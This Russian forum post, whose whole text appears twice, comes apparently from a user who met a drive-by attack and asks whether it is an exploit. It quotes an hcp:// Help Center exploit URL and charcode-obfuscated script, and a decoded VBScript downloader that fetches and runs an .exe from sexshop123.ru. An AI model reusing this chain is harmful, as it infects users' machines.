dr.Web
01.10.2010, 03:21
Вот такая штучка вежливо попросилась ко мне в систему. Самопроизвольно запустился Windows Media Player.
http://sexshop123.ru:81/el/z3l54j/oor5qphv.php?act=iframe&fh=
Во фрейме видим код:
PHP:
hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%A..%5C..%5Csysinfomain.htm%u003fsvr=%3 Cscript%20defer%3Eeval%28eval%28%27String.fromChar Code(118,97,114,32,111,61,100,111,99,117,109,101,1 10,116,46,99,114,101,97,116,101,69,108,101,109,101 ,110,116,40,34,115,99,114,105,112,116,34,41,59,111 ,46,115,101,116,65,116,116,114,105,98,117,116,101, 40,34,116,121,112,101,34,44,34,116,101,120,116,47, 106,97,118,97,115,99,114,105,112,116,34,41,59,111, 46,115,101,116,65,116,116,114,105,98,117,116,101,4 0,34,115,114,99,34,44,34,104,116,116,112,58,47,47, 115,101,120,115,104,111,112,49,50,51,46,114,117,58 ,56,49,47,101,108,47,122,51,108,53,52,106,47,111,1 11,114,53,113,112,104,118,46,112,104,112,63,97,99, 116,61,106,115,38,102,104,61,34,41,59,100,111,99,1 17,109,101,110,116,46,98,111,100,121,46,97,112,112 ,101,110,100,67,104,105,108,100,40,111,41,59)%27%2 9%29%3C/script%3E
который редактируем и выполняем:
PHP:
javascript:alert(String.fromCharCode(118,97,114,32 ,111,61,100,111,99,117,109,101,110,116,46,99,114,1 01,97,116,101,69,108,101,109,101,110,116,40,34,115 ,99,114,105,112,116,34,41,59,111,46,115,101,116,65 ,116,116,114,105,98,117,116,101,40,34,116,121,112, 101,34,44,34,116,101,120,116,47,106,97,118,97,115, 99,114,105,112,116,34,41,59,111,46,115,101,116,65, 116,116,114,105,98,117,116,101,40,34,115,114,99,34 ,44,34,104,116,116,112,58,47,47,115,101,120,115,10 4,111,112,49,50,51,46,114,117,58,56,49,47,101,108, 47,122,51,108,53,52,106,47,111,111,114,53,113,112, 104,118,46,112,104,112,63,97,99,116,61,106,115,38, 102,104,61,34,41,59,100,111,99,117,109,101,110,116 ,46,98,111,100,121,46,97,112,112,101,110,100,67,10 4,105,108,100,40,111,41,59))
Выяснилось, что подключается сторонний скрипт с того же сервера.
PHP:
Run(String.fromCharCode(99,109,100,32,47,99,32,101 ,99,104,111,32,83,101,116,32,65,114,103,79,98,106, 32,61,32,87,83,99,114,105,112,116,46,65,114,103,11 7,109,101,110,116,115,58,107,101,121,32,61,32,65,1 14,103,79,98,106,46,73,116,101,109,40,48,41,58,101 ,120,101,32,61,32,34,41,88,118,88,118,88,115,98,11 8,46,53,55,49,56,50,50,54,88,118,88,118,88,32,43,3 2,114,101,100,108,111,102,112,109,116,40,101,108,1 05,102,101,116,101,108,101,100,46,111,115,102,58,1 01,108,105,102,112,109,116,32,43,32,114,101,100,10 8,111,102,112,109,116,32,99,101,120,101,46,108,108 ,101,104,115,58,50,32,44,101,108,105,102,112,109,1 16,32,43,32,114,101,100,108,111,102,112,109,116,32 ,101,108,105,102,111,116,101,118,97,115,46,109,97, 101,114,116,115,111,100,97,111,58,32,121,100,111,9 8,101,115,110,111,112,115,101,114,46,112,116,116,1 04,108,109,120,32,32,101,116,105,114,119,46,109,97 ,101,114,116,115,111,100,97,111,58,32,110,101,112, 111,46,109,97,101,114,116,115,111,100,97,111,58,32 ,49,32,61,32,101,112,121,116,46,109,97,101,114,116 ,115,111,100,97,111,58,32,51,32,61,32,101,100,111, 109,46,109,97,101,114,116,115,111,100,97,111,58,10 0,110,101,83,46,112,116,116,104,108,109,120,58,48, 32,44,108,114,117,32,44,88,118,88,118,88,84,69,71, 88,118,88,118,88,32,110,101,112,79,46,112,116,116, 104,108,109,120,58,88,118,88,118,88,101,120,101,46 ,53,55,49,56,50,50,54,88,118,88,118,88,32,61,32,10 1,108,105,102,112,109,116,58,88,118,88,118,88,92,8 8,118,88,118,88,32,43,32,41,88,118,88,118,88,80,77 ,69,84,88,118,88,118,88,40,109,101,116,105,46,41,8 8,118,88,118,88,83,83,69,67,79,82,80,88,118,88,118 ,88,40,116,110,101,109,110,111,114,105,118,110,101 ,46,108,108,101,104,115,32,61,32,114,101,100,108,1 11,102,112,109,116,58,88,118,88,118,88,61,104,102, 38,80,67,72,61,108,112,115,63,112,104,112,46,55,54 ,57,117,105,98,117,120,47,106,52,53,108,51,122,47, 108,101,47,49,56,58,117,114,46,51,50,49,112,111,10 4,115,120,101,115,47,47,58,112,116,116,104,88,118, 88,118,88,32,61,32,108,114,117,58,41,88,118,88,118 
,88,116,99,101,106,98,111,109,101,116,115,121,115, 101,108,105,70,46,103,110,105,116,112,105,114,99,8 3,88,118,88,118,88,40,116,99,101,106,98,111,101,11 6,97,101,114,99,32,61,32,111,115,102,32,116,101,11 5,58,41,88,118,88,118,88,108,108,101,104,83,46,116 ,112,105,114,99,83,87,88,118,88,118,88,40,116,99,1 01,106,98,111,101,116,97,101,114,99,32,61,32,108,1 08,101,104,115,32,116,101,115,58,41,88,118,88,118, 88,109,97,101,114,116,115,46,98,100,111,100,97,88, 118,88,118,88,40,116,99,101,106,98,111,101,116,97, 101,114,99,32,61,32,109,97,101,114,116,115,111,100 ,97,111,32,116,101,115,58,41,88,118,88,118,88,80,8 4,84,72,76,77,88,46,50,76,77,88,83,77,88,118,88,11 8,88,40,116,99,101,106,98,111,101,116,97,101,114,9 9,32,61,32,112,116,116,104,108,109,120,32,116,101, 115,34,58,101,120,101,32,61,32,82,101,112,108,97,9 9,101,40,101,120,101,44,107,101,121,44,67,104,114, 40,51,52,41,41,58,101,120,101,32,61,32,83,116,114, 82,101,118,101,114,115,101,40,101,120,101,41,58,10 1,120,101,99,117,116,101,40,101,120,101,41,32,62,3 7,84,69,77,80,37,92,54,50,50,56,49,55,53,46,118,98 ,115,32,38,99,115,99,114,105,112,116,32,37,84,69,7 7,80,37,92,54,50,50,56,49,55,53,46,118,98,115,32,4 7,47,98,32,47,47,115,32,88,118,88,118,88));
Подредактировав скрипт, выводим его в алерт:
PHP:
cmd/cechoSet ArgObj=WScript.Arguments:key=ArgObj.Item (0):exe=")XvXvXsbv.5718226XvXvX + redlofpmt(elifeteled.os f:elifpmt + redlofpmt cexe.llehs:2 ,elifpmt + redlofpmt elifotevas.maertsodao: ydobesnopser. ptthlmx etirw.maertsodao: nepo.maertsodao: 1 = epyt.maertsodao: 3 = edom.maertsodao:dneS.p tthlmx:0 ,lru ,XvXvXTEGXvXvX nepO.ptthlmx:XvXvX exe.5718226XvXvX = elifpmt:XvXvX\XvXvX + )XvXv XPMETXvXvX(meti.)XvXvXSSECORPXvXvX(tnemnorivne.lle hs = redlofpmt:XvXvX=hf&PCH=lps?php.769uibux/j45l3z/le/18:ur.321pohsxes//:ptthXvXvX = lru:)XvXvXtcejbometsyseliF.gnitpirc SXvXvX(tcejboetaerc = osf tes:)XvXvXllehS.tpirc SWXvXvX(tcejboetaerc = llehs tes:)XvXvXmaerts.b dodaXvXvX(tcejboetaerc = maertsodao tes:)XvXvXP TTHLMX.2LMXSMXvXvX(tcejboetaerc = ptthlmx tes":exe=Replace(exe,key,Chr(34)):exe=StrReverse(exe): execute(exe) >%TEMP%\6228175.vbs&cscript%TEMP%\6228175.vbs//b //s XvXvX
По коду заметил, что часть его перевёрнута задом наперёд (в конце вызывается StrReverse(exe)). А теперь вопрос: это сплоит?)
И что делает этот код?
http://sexshop123.ru:81/el/z3l54j/oor5qphv.php?act=iframe&fh=
Во фрейме видим код:
PHP:
hcp://services/search?query=a&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%A..%5C..%5Csysinfomain.htm%u003fsvr=%3 Cscript%20defer%3Eeval%28eval%28%27String.fromChar Code(118,97,114,32,111,61,100,111,99,117,109,101,1 10,116,46,99,114,101,97,116,101,69,108,101,109,101 ,110,116,40,34,115,99,114,105,112,116,34,41,59,111 ,46,115,101,116,65,116,116,114,105,98,117,116,101, 40,34,116,121,112,101,34,44,34,116,101,120,116,47, 106,97,118,97,115,99,114,105,112,116,34,41,59,111, 46,115,101,116,65,116,116,114,105,98,117,116,101,4 0,34,115,114,99,34,44,34,104,116,116,112,58,47,47, 115,101,120,115,104,111,112,49,50,51,46,114,117,58 ,56,49,47,101,108,47,122,51,108,53,52,106,47,111,1 11,114,53,113,112,104,118,46,112,104,112,63,97,99, 116,61,106,115,38,102,104,61,34,41,59,100,111,99,1 17,109,101,110,116,46,98,111,100,121,46,97,112,112 ,101,110,100,67,104,105,108,100,40,111,41,59)%27%2 9%29%3C/script%3E
который редактируем и выполняем:
PHP:
javascript:alert(String.fromCharCode(118,97,114,32 ,111,61,100,111,99,117,109,101,110,116,46,99,114,1 01,97,116,101,69,108,101,109,101,110,116,40,34,115 ,99,114,105,112,116,34,41,59,111,46,115,101,116,65 ,116,116,114,105,98,117,116,101,40,34,116,121,112, 101,34,44,34,116,101,120,116,47,106,97,118,97,115, 99,114,105,112,116,34,41,59,111,46,115,101,116,65, 116,116,114,105,98,117,116,101,40,34,115,114,99,34 ,44,34,104,116,116,112,58,47,47,115,101,120,115,10 4,111,112,49,50,51,46,114,117,58,56,49,47,101,108, 47,122,51,108,53,52,106,47,111,111,114,53,113,112, 104,118,46,112,104,112,63,97,99,116,61,106,115,38, 102,104,61,34,41,59,100,111,99,117,109,101,110,116 ,46,98,111,100,121,46,97,112,112,101,110,100,67,10 4,105,108,100,40,111,41,59))
Выяснилось, что подключается сторонний скрипт с того же сервера.
PHP:
Run(String.fromCharCode(99,109,100,32,47,99,32,101 ,99,104,111,32,83,101,116,32,65,114,103,79,98,106, 32,61,32,87,83,99,114,105,112,116,46,65,114,103,11 7,109,101,110,116,115,58,107,101,121,32,61,32,65,1 14,103,79,98,106,46,73,116,101,109,40,48,41,58,101 ,120,101,32,61,32,34,41,88,118,88,118,88,115,98,11 8,46,53,55,49,56,50,50,54,88,118,88,118,88,32,43,3 2,114,101,100,108,111,102,112,109,116,40,101,108,1 05,102,101,116,101,108,101,100,46,111,115,102,58,1 01,108,105,102,112,109,116,32,43,32,114,101,100,10 8,111,102,112,109,116,32,99,101,120,101,46,108,108 ,101,104,115,58,50,32,44,101,108,105,102,112,109,1 16,32,43,32,114,101,100,108,111,102,112,109,116,32 ,101,108,105,102,111,116,101,118,97,115,46,109,97, 101,114,116,115,111,100,97,111,58,32,121,100,111,9 8,101,115,110,111,112,115,101,114,46,112,116,116,1 04,108,109,120,32,32,101,116,105,114,119,46,109,97 ,101,114,116,115,111,100,97,111,58,32,110,101,112, 111,46,109,97,101,114,116,115,111,100,97,111,58,32 ,49,32,61,32,101,112,121,116,46,109,97,101,114,116 ,115,111,100,97,111,58,32,51,32,61,32,101,100,111, 109,46,109,97,101,114,116,115,111,100,97,111,58,10 0,110,101,83,46,112,116,116,104,108,109,120,58,48, 32,44,108,114,117,32,44,88,118,88,118,88,84,69,71, 88,118,88,118,88,32,110,101,112,79,46,112,116,116, 104,108,109,120,58,88,118,88,118,88,101,120,101,46 ,53,55,49,56,50,50,54,88,118,88,118,88,32,61,32,10 1,108,105,102,112,109,116,58,88,118,88,118,88,92,8 8,118,88,118,88,32,43,32,41,88,118,88,118,88,80,77 ,69,84,88,118,88,118,88,40,109,101,116,105,46,41,8 8,118,88,118,88,83,83,69,67,79,82,80,88,118,88,118 ,88,40,116,110,101,109,110,111,114,105,118,110,101 ,46,108,108,101,104,115,32,61,32,114,101,100,108,1 11,102,112,109,116,58,88,118,88,118,88,61,104,102, 38,80,67,72,61,108,112,115,63,112,104,112,46,55,54 ,57,117,105,98,117,120,47,106,52,53,108,51,122,47, 108,101,47,49,56,58,117,114,46,51,50,49,112,111,10 4,115,120,101,115,47,47,58,112,116,116,104,88,118, 88,118,88,32,61,32,108,114,117,58,41,88,118,88,118 
,88,116,99,101,106,98,111,109,101,116,115,121,115, 101,108,105,70,46,103,110,105,116,112,105,114,99,8 3,88,118,88,118,88,40,116,99,101,106,98,111,101,11 6,97,101,114,99,32,61,32,111,115,102,32,116,101,11 5,58,41,88,118,88,118,88,108,108,101,104,83,46,116 ,112,105,114,99,83,87,88,118,88,118,88,40,116,99,1 01,106,98,111,101,116,97,101,114,99,32,61,32,108,1 08,101,104,115,32,116,101,115,58,41,88,118,88,118, 88,109,97,101,114,116,115,46,98,100,111,100,97,88, 118,88,118,88,40,116,99,101,106,98,111,101,116,97, 101,114,99,32,61,32,109,97,101,114,116,115,111,100 ,97,111,32,116,101,115,58,41,88,118,88,118,88,80,8 4,84,72,76,77,88,46,50,76,77,88,83,77,88,118,88,11 8,88,40,116,99,101,106,98,111,101,116,97,101,114,9 9,32,61,32,112,116,116,104,108,109,120,32,116,101, 115,34,58,101,120,101,32,61,32,82,101,112,108,97,9 9,101,40,101,120,101,44,107,101,121,44,67,104,114, 40,51,52,41,41,58,101,120,101,32,61,32,83,116,114, 82,101,118,101,114,115,101,40,101,120,101,41,58,10 1,120,101,99,117,116,101,40,101,120,101,41,32,62,3 7,84,69,77,80,37,92,54,50,50,56,49,55,53,46,118,98 ,115,32,38,99,115,99,114,105,112,116,32,37,84,69,7 7,80,37,92,54,50,50,56,49,55,53,46,118,98,115,32,4 7,47,98,32,47,47,115,32,88,118,88,118,88));
Подредактировав скрипт, выводим его в алерт:
PHP:
cmd/cechoSet ArgObj=WScript.Arguments:key=ArgObj.Item (0):exe=")XvXvXsbv.5718226XvXvX + redlofpmt(elifeteled.os f:elifpmt + redlofpmt cexe.llehs:2 ,elifpmt + redlofpmt elifotevas.maertsodao: ydobesnopser. ptthlmx etirw.maertsodao: nepo.maertsodao: 1 = epyt.maertsodao: 3 = edom.maertsodao:dneS.p tthlmx:0 ,lru ,XvXvXTEGXvXvX nepO.ptthlmx:XvXvX exe.5718226XvXvX = elifpmt:XvXvX\XvXvX + )XvXv XPMETXvXvX(meti.)XvXvXSSECORPXvXvX(tnemnorivne.lle hs = redlofpmt:XvXvX=hf&PCH=lps?php.769uibux/j45l3z/le/18:ur.321pohsxes//:ptthXvXvX = lru:)XvXvXtcejbometsyseliF.gnitpirc SXvXvX(tcejboetaerc = osf tes:)XvXvXllehS.tpirc SWXvXvX(tcejboetaerc = llehs tes:)XvXvXmaerts.b dodaXvXvX(tcejboetaerc = maertsodao tes:)XvXvXP TTHLMX.2LMXSMXvXvX(tcejboetaerc = ptthlmx tes":exe=Replace(exe,key,Chr(34)):exe=StrReverse(exe): execute(exe) >%TEMP%\6228175.vbs&cscript%TEMP%\6228175.vbs//b //s XvXvX
По коду заметил, что часть его перевёрнута задом наперёд (в конце вызывается StrReverse(exe)). А теперь вопрос: это сплоит?)
И что делает этот код?